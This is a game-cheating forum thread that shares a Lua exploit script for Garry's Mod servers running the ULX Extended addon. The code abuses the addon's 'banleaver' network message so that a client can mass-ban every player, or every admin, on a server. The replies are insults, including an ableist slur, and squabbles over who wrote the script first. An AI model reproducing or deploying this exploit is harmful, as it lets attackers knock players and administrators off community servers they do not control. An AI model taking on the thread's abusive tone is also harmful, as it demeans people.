ULX Extended Script

Posts 1–10 of 10 · Page 1 of 1
ULX Extended Script
It's impossible to find a server where these actually work so here ya go scrubbies. The only ULX Extended servers I have found have patched this already.

Code:
if Warnings_for_kick then
print("ULX Extended found.")
concommand.Add("banall", function()
for k,v in pairs(player.GetAll()) do
	if not v == LocalPlayer() then 
		net.Start("banleaver")
		net.WriteString(tostring(v:SteamID().."{sep}"..tostring(v:Name())))
		net.SendToServer()
	end
end
end)
concommand.Add("banadmins", function()
for k,v in pairs(player.GetAll()) do
	if not v == LocalPlayer() and v:Admin() then 
		net.Start("banleaver")
		net.WriteString(tostring(v:SteamID().."{sep}"..tostring(v:Name())))
		net.SendToServer()
	end
end
end)
else
print("ULX Extended not found.")
end
nice dude this has never been seen b4
wow sick anyone have that since the beginning of time
Quote Originally Posted by _Fami View Post
wow sick anyone have that since the beginning of time
fuck you miku
Quote Originally Posted by roleplayer360 View Post
fuck you miku
lol little autistic child is mad it seems :^)
btw that can be exploited with a ban exploit :/
This was either taken from me @ HAC booty or you happen to know a friend of mine or you just code the concommands, if check, etc the exact same as the one I made.
Nice way to leech from me, it's really simple to make.
Quote Originally Posted by tehhkp View Post
This was either taken from me @ HAC booty or you happen to know a friend of mine or you just code the concommands, if check, etc the exact same as the one I made.
Nice way to leech from me, it's really simple to make.
The fact that you're even complaining about people copying this script is laughable. What matters is the net part. This shit has been out for ages now anyways.
Quote Originally Posted by tdsx View Post
The fact that you're even complaining about people copying this script is laughable. What matters is the net part. This shit has been out for ages now anyways.
No, that's the whole reason I posted it. I'm not complaining, I'm saying that it's sad that the guy has to look in HAC booty and steal my specific script that I edited. It's public and has been for ages like you just said.
ulx extended exploit stolen from sethhack skid use hera
Posts 1–10 of 10 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?